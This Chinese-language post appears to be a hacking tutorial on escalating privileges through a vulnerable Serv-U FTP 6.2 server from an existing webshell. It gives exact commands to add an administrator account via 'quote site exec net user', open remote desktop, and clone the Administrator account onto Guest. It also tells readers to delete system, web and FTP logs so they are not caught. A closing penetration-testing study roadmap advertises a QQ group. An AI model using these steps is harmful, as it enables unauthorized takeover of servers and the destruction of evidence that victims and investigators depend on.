ftp提权的问题

开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个

wscriptshell √ 命令行执行组件

在看看这里 开了终端了 有时候没开也会显示3389

个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的

方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v62

有开FTP 而且是62版本的 有利用价值 这个让我们想到FTP的提权

连得上 说明开着 （小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下）

接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的

我简单说明一下就好了 Add User 这里是添加 Del User 删除

RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了

FTP帐号 lake 密码 admin123

连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开

说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令

quote site exec net user shayu 83073645 /add添加用户

200 EXEC command successful (TID=33)

成功 继续添加权限

200 EXEC command successful (TID=33) OK了

服务器的3389已经被我开过了 我简单演示一下怎么开就OK了

用到一个工具AIOexe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了

集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去

现在看操作 我用工具传过去比较方便点

命令 quote site exec Aioexe -Terminal 3389

在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以

OK 开了 在用这个命令Aioexe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接

登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了

走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽

清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了

就到这里 88咯

相关命令：

Aioexe -Clone Administrator Guest 83073645

Aioexe -Terminal 3389

ftp提权命令:quote site exec net user shayu 83073645 /add

quote site exec net localgroup administrators shayu /add

这个要根据个人的实际情况来决定的，比如你先要去了解什么是渗透测试：

1、渗透测试属于信息安全行业，准确的说是网络计算机/IT行业

2、现在你知道了它的行业属性，那么你是否具备一些这个行业的知识呢

3、具备的话学习起来比较简单，直接去学习渗透测试实战就行，不具备接着往下看

4、现在知道它行业属性，你大概就能清楚需要些什么样的基础知识了；下面是我从非计算机网络相关专业的同学想要学习渗透测试必须掌握的知识。

5、前期入门大概需要掌握或者说了解以下知识点：

1)了解基本的网络知识，例如什么是IP地址（636261123）去掉点是扣扣学习群，IP地址的基本概念、IP段划分、什么是A段、B段、C段等2）广域网、局域网、相关概念和IP地址划分范围。

3)端口的基本概念？端口的分类？

4)域名的基本概念、什么是URL、了解TCP/IP协议、

5)了解开放式通信系统互联参考模型（OSI）

6)了解http（超文本传输协议）协议概念、工作原理

7)了解WEB的静态页面和WEB动态页面，B/S和C/S结构

8)了解常见的服务器、例如、Windows server2003、Linux、UNIX等

9)了解常见的数据库、MySQL、Mssql、、Access、Oracle、db2等

10)了解基本的网络架构、例如：Linux + Apache + MySQL + php

11)了解基本的Html语言，就是打开网页后,在查看源码里面的Html语言

12)了解一种基本的脚本语言、例如PHP或者asp，jsp，cgi等

然后你想学习入门，需要学习以下最基础的知识：

1、开始入门学习路线

1)深入学习一种数据库语言，建议从MySQL数据库或者SQL Server数据库、简单易学且学会了。

其他数据库都差不多会了。

2)开始学习网络安全漏洞知识、SQL注入、XSS跨站脚本漏洞、CSRF、解析漏洞、上传漏洞、命令执行、弱口令、万能密码、文件包含漏洞、本地溢出、远程溢出漏洞等等

)工具使用的学习、御剑、明小子、啊D、穿山甲（Pangolin）、Sqlmap、burpsuite抓包工具等等

2、Google hacker 语法学习

3、漏洞利用学习、SQL注入、XSS、上传、解析漏洞等

4、漏洞挖掘学习

5、想成为大牛的话、以上都是皮毛中的皮毛，但前提是以上的皮毛都是最基础的。

6、Linux系统命令学习、kali Linux 里面的工具学习、Metesploit学习

7、你也可以找一些扣扣群去和大佬交流，比如上面的IP去掉点就是，里面有很多的教程。

8、没事多逛逛安全论坛、看看技术大牛的文章、漏洞分析文章等